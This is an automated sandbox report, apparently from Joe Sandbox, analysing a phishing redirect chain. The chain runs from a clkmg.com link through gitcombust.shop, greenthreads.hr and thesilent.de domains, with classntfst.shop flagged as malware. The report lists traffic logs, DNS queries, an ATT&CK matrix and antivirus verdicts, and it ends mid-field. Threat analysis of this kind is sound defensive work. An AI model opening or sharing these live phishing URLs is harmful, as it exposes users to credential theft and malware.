Source: global trafficHTTP traffic detected: GET /_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/19d09a6113afa007.css HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /background.jpg HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oka.greenthreads.hr/_next/static/css/19d09a6113afa007.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9If-None-Match: "4b5febb3fb4517a225620b5fe05016d2"If-Modified-Since: Thu, 27 Mar 2025 11:43:47 GMT
Source: global trafficHTTP traffic detected: GET /background.jpg HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9If-None-Match: "4b5febb3fb4517a225620b5fe05016d2"If-Modified-Since: Thu, 27 Mar 2025 11:43:47 GMT
Source: global trafficDNS traffic detected: DNS query: www.clkmg.com
Source: global trafficDNS traffic detected: DNS query: netro.gitcombust.shop
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: patnero.thesilent.de
Source: global trafficDNS traffic detected: DNS query: classntfst.shop
Source: global trafficDNS traffic detected: DNS query: oka.greenthreads.hr
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/jsd/r/0.216127262788091:1743517896:WH6ejxtsVObjbtfWl3K5Ys8Re23onSxZleFLZs8jUh4/929932861ac41512 HTTP/1.1Host: netro.gitcombust.shopConnection: keep-aliveContent-Length: 16562sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8sec-ch-ua-mobile: ?0Accept: */*Origin: https://netro.gitcombust.shopSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 15:42:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCf-Ray: 929932915f50425d-EWRServer: cloudflareCf-Cache-Status: HITAccess-Control-Allow-Origin: *Age: 71Cache-Control: max-age=14400Vary: Accept-EncodingX-Frame-Options: DENYX-Ms-Error-Code: WebContentNotFoundX-Ms-Request-Id: 09271e96-901e-004f-271c-a389b4000000X-Ms-Version: 2018-03-28Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbRrP%2FvfWD7Z98QTtF%2FFglELoafOFMXhQtTXWVyxjR44wD%2BDoSIVnyaOece5sOL71wauXUxZwjZ8gn3kmrOjY23ImMWh%2BExWOn5%2FH6oLCnC1nRHw%2B44nfzt8elSMaOrGkLmc1WEX4i4%3D"}],"group":"cf-nel","max_age":604800}Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=104641&min_rtt=103947&rtt_var=22614&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1177&delivery_rate=35812&cwnd=231&unsent_bytes=0&cid=78a88924c9f9d997&ts=610&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 15:42:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-headers: Content-Type, Authorizationaccess-control-allow-methods: GET, POST, OPTIONSaccess-control-allow-origin: *content-security-policy: default-src 'none'rndr-id: b285bce4-88d9-4d1avary: Accept-Encodingx-content-type-options: nosniffx-powered-by: Expressx-render-origin-server: Rendercf-cache-status: DYNAMICServer: cloudflareCF-RAY: 929932b7fbf042be-EWRalt-svc: h3=":443"; ma=86400
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 52.11.99.233:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.11.99.233:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.83.187.233:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.72.100:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.88.234:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6644_168253444
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6644_168253444
Source: classification engineClassification label: mal68.phis.win@24/21@29/181
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,15434814748562672815,12799368222423242180,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.clkmg.com/h4pussy/1ywq9a"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,15434814748562672815,12799368222423242180,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
12
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.clkmg.com/h4pussy/1ywq9a0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/jsd/r/0.216127262788091:1743517896:WH6ejxtsVObjbtfWl3K5Ys8Re23onSxZleFLZs8jUh4/929932861ac415120%Avira URL Cloudsafe
https://www.clkmg.com/favicon.ico0%Avira URL Cloudsafe
https://netro.gitcombust.shop/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
https://netro.gitcombust.shop/favicon.ico0%Avira URL Cloudsafe
https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?0%Avira URL Cloudsafe
https://a.nel.cloudflare.com/report/v4?s=mbRrP%2FvfWD7Z98QTtF%2FFglELoafOFMXhQtTXWVyxjR44wD%2BDoSIVnyaOece5sOL71wauXUxZwjZ8gn3kmrOjY23ImMWh%2BExWOn5%2FH6oLCnC1nRHw%2B44nfzt8elSMaOrGkLmc1WEX4i4%3D0%Avira URL Cloudsafe
https://netro.gitcombust.shop/script.js0%Avira URL Cloudsafe
https://netro.gitcombust.shop/styles.css0%Avira URL Cloudsafe
https://oka.greenthreads.hr/background.jpg0%Avira URL Cloudsafe
https://classntfst.shop/ne/100%Avira URL Cloudmalware
https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js0%Avira URL Cloudsafe
https://oka.greenthreads.hr/_next/static/chunks/main-de1ad41d606513c1.js0%Avira URL Cloudsafe
https://oka.greenthreads.hr/_next/static/chunks/webpack-ee7e63bc15b31913.js0%Avira URL Cloudsafe
https://oka.greenthreads.hr/_next/static/chunks/framework-2c79e2a64abdb08b.js0%Avira URL Cloudsafe
https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js0%Avira URL Cloudsafe
https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.js0%Avira URL Cloudsafe
https://oka.greenthreads.hr/_next/static/chunks/186-e401717d9e8b842b.js0%Avira URL Cloudsafe
https://patnero.thesilent.de/api/get_doc_url0%Avira URL Cloudsafe
https://oka.greenthreads.hr/favicon.ico0%Avira URL Cloudsafe
https://oka.greenthreads.hr/_next/static/chunks/pages/_app-aea6920bd27938ca.js0%Avira URL Cloudsafe
https://oka.greenthreads.hr/_next/static/css/19d09a6113afa007.css0%Avira URL Cloudsafe
https://a.nel.cloudflare.com/report/v4?s=uscPBZFboHSqjG3PBXoSNdgWTJJ3Ec3XxwGQOY4aqFvfGmrquJVDLxvvwfn0jb7nav%2FrtbATB%2FdhYaWp322tlNP8i5IpZtatlkOjeVVJM4%2FYr5p1x48do12nsCibz%2FLGhfF%2FJAivCrM%3D0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    patnero.thesilent.de
    216.24.57.1
    truefalse
      high
      classntfst.shop
      104.21.88.234
      truefalse
        high
        oka.greenthreads.hr
        76.76.21.21
        truefalse
          high
          netro.gitcombust.shop
          104.21.32.1
          truefalse
            high
            www.google.com
            142.250.72.100
            truefalse
              high
              clk-1038715867.us-west-2.elb.amazonaws.com
              52.11.99.233
              truefalse
                unknown
                www.clkmg.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://oka.greenthreads.hr/background.jpgtrue
                  • Avira URL Cloud: safe
                  unknown
                  https://netro.gitcombust.shop/styles.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.clkmg.com/redir.cgi?url=5YLzHJtmmpWmacBzmzCY%2flX4xlmtZYa5OH2D9HeWNiho6ITfHFNLv4fgDcASlkcXru2gSFAsJp%2fzvbDs&pixel=0&lidc=1749346618false
                    unknown
                    https://a.nel.cloudflare.com/report/v4?s=mbRrP%2FvfWD7Z98QTtF%2FFglELoafOFMXhQtTXWVyxjR44wD%2BDoSIVnyaOece5sOL71wauXUxZwjZ8gn3kmrOjY23ImMWh%2BExWOn5%2FH6oLCnC1nRHw%2B44nfzt8elSMaOrGkLmc1WEX4i4%3Dfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://netro.gitcombust.shop/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.clkmg.com/favicon.icofalse
                    • Avira URL Cloud: safe
                    unknown
                    https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.jstrue
                    • Avira URL Cloud: safe
                    unknown
                    https://a.nel.cloudflare.com/report/v4?s=uscPBZFboHSqjG3PBXoSNdgWTJJ3Ec3XxwGQOY4aqFvfGmrquJVDLxvvwfn0jb7nav%2FrtbATB%2FdhYaWp322tlNP8i5IpZtatlkOjeVVJM4%2FYr5p1x48do12nsCibz%2FLGhfF%2FJAivCrM%3Dfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://oka.greenthreads.hr/_next/static/chunks/framework-2c79e2a64abdb08b.jstrue
                    • Avira URL Cloud: safe
                    unknown
                    https://classntfst.shop/ne/true
                    • Avira URL Cloud: malware
                    unknown
                    https://patnero.thesilent.de/api/get_doc_urlfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://oka.greenthreads.hr/true
                      unknown
                      https://oka.greenthreads.hr/_next/static/chunks/main-de1ad41d606513c1.jstrue
                      • Avira URL Cloud: safe
                      unknown
                      https://netro.gitcombust.shop/script.jsfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?false
                      • Avira URL Cloud: safe
                      unknown
                      https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.jstrue
                      • Avira URL Cloud: safe
                      unknown
                      https://oka.greenthreads.hr/_next/static/chunks/webpack-ee7e63bc15b31913.jstrue
                      • Avira URL Cloud: safe
                      unknown
                      https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/jsd/r/0.216127262788091:1743517896:WH6ejxtsVObjbtfWl3K5Ys8Re23onSxZleFLZs8jUh4/929932861ac41512false
                      • Avira URL Cloud: safe
                      unknown
                      https://oka.greenthreads.hr/_next/static/chunks/186-e401717d9e8b842b.jstrue
                      • Avira URL Cloud: safe
                      unknown
                      https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.jstrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.clkmg.com/h4pussy/1ywq9afalse
                        unknown
                        https://netro.gitcombust.shop/false
                          unknown
                          https://oka.greenthreads.hr/favicon.icotrue
                          • Avira URL Cloud: safe
                          unknown
                          https://netro.gitcombust.shop/favicon.icofalse
                          • Avira URL Cloud: safe
                          unknown
                          https://oka.greenthreads.hr/_next/static/chunks/pages/_app-aea6920bd27938ca.jstrue
                          • Avira URL Cloud: safe
                          unknown
                          https://oka.greenthreads.hr/_next/static/css/19d09a6113afa007.csstrue
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.48.1
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          104.21.88.234
                          classntfst.shopUnited States
                          13335CLOUDFLARENETUSfalse
                          1.1.1.1
                          unknownAustralia
                          13335CLOUDFLARENETUSfalse
                          104.21.32.1
                          netro.gitcombust.shopUnited States
                          13335CLOUDFLARENETUSfalse
                          216.24.57.1
                          patnero.thesilent.deUnited States
                          397273RENDERUSfalse
                          142.250.176.206
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.64.106
                          unknownUnited States
                          15169GOOGLEUSfalse
                          35.83.187.233
                          unknownUnited States
                          237MERIT-AS-14USfalse
                          142.250.80.67
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.251.40.110
                          unknownUnited States
                          15169GOOGLEUSfalse
                          52.11.99.233
                          clk-1038715867.us-west-2.elb.amazonaws.comUnited States
                          16509AMAZON-02USfalse
                          142.251.40.163
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.72.100
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          35.190.80.1
                          a.nel.cloudflare.comUnited States
                          15169GOOGLEUSfalse
                          76.76.21.21
                          oka.greenthreads.hrUnited States
                          16509AMAZON-02USfalse
                          142.251.41.3
                          unknownUnited States
                          15169GOOGLEUSfalse
                          172.253.115.84
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.251.35.174
                          unknownUnited States
                          15169GOOGLEUSfalse
                          IP
                          192.168.2.16
                          192.168.2.11
                          192.168.2.24
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1653902
                          Start date and time:2025-04-01 17:41:34 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
